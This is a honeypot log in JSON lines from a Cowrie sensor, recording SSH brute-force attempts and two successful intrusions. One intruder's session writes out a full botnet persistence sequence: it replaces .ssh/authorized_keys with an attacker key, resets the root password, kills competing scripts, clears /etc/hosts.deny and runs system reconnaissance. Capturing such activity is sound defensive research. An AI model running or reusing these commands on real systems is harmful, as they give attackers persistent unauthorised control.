{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:14:53.790776Z","src_ip":"186.225.142.90","session":"63d348ff2b96"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T13:14:53.791539Z","src_ip":"186.225.142.90","session":"63d348ff2b96"}
{"eventid":"cowrie.login.success","username":"root","password":"10011971","message":"login attempt [root/10011971] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:14:55.367176Z","src_ip":"186.225.142.90","session":"63d348ff2b96"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:14:55.883825Z","src_ip":"186.225.142.90","session":"63d348ff2b96"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T13:14:55.884491Z","src_ip":"186.225.142.90","session":"63d348ff2b96"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:14:56.104495Z","src_ip":"186.225.142.90","session":"63d348ff2b96"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:14:56.129564Z","src_ip":"186.225.142.90","session":"63d348ff2b96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33080,"dst_ip":"1.2.3.4","dst_port":22,"session":"6427ccafdb92","protocol":"ssh","message":"New connection: 212.227.125.160:33080 (1.2.3.4:22) [session: 6427ccafdb92]","sensor":"my-vps","timestamp":"2025-08-28T13:15:15.320680Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:15:15.321965Z","src_ip":"212.227.125.160","session":"6427ccafdb92"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:15:15.499153Z","src_ip":"212.227.125.160","session":"6427ccafdb92"}
{"eventid":"cowrie.login.failed","username":"docker","password":"123123","message":"login attempt [docker/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:15:16.436602Z","src_ip":"212.227.125.160","session":"6427ccafdb92"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:15:17.616763Z","src_ip":"212.227.125.160","session":"6427ccafdb92"}
{"eventid":"cowrie.session.connect","src_ip":"86.16.175.213","src_port":41599,"dst_ip":"1.2.3.4","dst_port":23,"session":"8332cc9ec6d3","protocol":"telnet","message":"New connection: 86.16.175.213:41599 (1.2.3.4:23) [session: 8332cc9ec6d3]","sensor":"my-vps","timestamp":"2025-08-28T13:15:31.325747Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50550,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad003f6ed9dd","protocol":"ssh","message":"New connection: 212.227.125.160:50550 (1.2.3.4:22) [session: ad003f6ed9dd]","sensor":"my-vps","timestamp":"2025-08-28T13:15:51.734704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:15:51.741279Z","src_ip":"212.227.125.160","session":"ad003f6ed9dd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:15:51.904629Z","src_ip":"212.227.125.160","session":"ad003f6ed9dd"}
{"eventid":"cowrie.login.failed","username":"docker","password":"111111","message":"login attempt [docker/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T13:15:52.586480Z","src_ip":"212.227.125.160","session":"ad003f6ed9dd"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:15:53.940518Z","src_ip":"212.227.125.160","session":"ad003f6ed9dd"}
{"eventid":"cowrie.session.closed","duration":30.923460721969604,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:02.249141Z","src_ip":"86.16.175.213","session":"8332cc9ec6d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43702,"dst_ip":"1.2.3.4","dst_port":22,"session":"7748c29c15c0","protocol":"ssh","message":"New connection: 212.227.235.229:43702 (1.2.3.4:22) [session: 7748c29c15c0]","sensor":"my-vps","timestamp":"2025-08-28T13:16:23.025970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:16:23.026946Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:16:23.234582Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.login.success","username":"root","password":"a123456+","message":"login attempt [root/a123456+] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:16:24.067412Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:16:24.500034Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:16:24.500819Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:16:24.501920Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:24.711500Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:16:25.597440Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T13:16:25.598241Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T13:16:25.808813Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:25.809812Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43140,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3f2794e67fa","protocol":"ssh","message":"New connection: 212.227.125.160:43140 (1.2.3.4:22) [session: a3f2794e67fa]","sensor":"my-vps","timestamp":"2025-08-28T13:16:28.440123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:16:28.461209Z","src_ip":"212.227.125.160","session":"a3f2794e67fa"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:16:28.641714Z","src_ip":"212.227.125.160","session":"a3f2794e67fa"}
{"eventid":"cowrie.login.failed","username":"docker","password":"1234567","message":"login attempt [docker/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T13:16:29.285583Z","src_ip":"212.227.125.160","session":"a3f2794e67fa"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:30.523160Z","src_ip":"212.227.125.160","session":"a3f2794e67fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:16:38.045919Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-28T13:16:38.046610Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:38.256558Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:16:38.735879Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.command.input","input":"echo \"root:w5I4G5ZenOYg\"|chpasswd|bash","message":"CMD: echo \"root:w5I4G5ZenOYg\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-28T13:16:38.736583Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/2ff7961c399df2052f4ac4a540f83d763ec509028f39b666351e913eaa3245aa","size":21,"shasum":"2ff7961c399df2052f4ac4a540f83d763ec509028f39b666351e913eaa3245aa","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/2ff7961c399df2052f4ac4a540f83d763ec509028f39b666351e913eaa3245aa after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:38.946331Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:16:39.383073Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-28T13:16:39.383848Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-28T13:16:39.595807Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:39.596812Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:16:40.081523Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-28T13:16:40.082517Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:40.293842Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:16:40.771125Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-28T13:16:40.771792Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:40.981734Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:16:41.816090Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-28T13:16:41.816785Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-28T13:16:41.817178Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:42.028013Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:16:42.462299Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-28T13:16:42.463104Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:42.673359Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:16:43.150120Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-28T13:16:43.150814Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":205,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:16:43.360333Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:16:43.839083Z","src_ip":"212.227.235.229","session":"7748c29c15c0"}
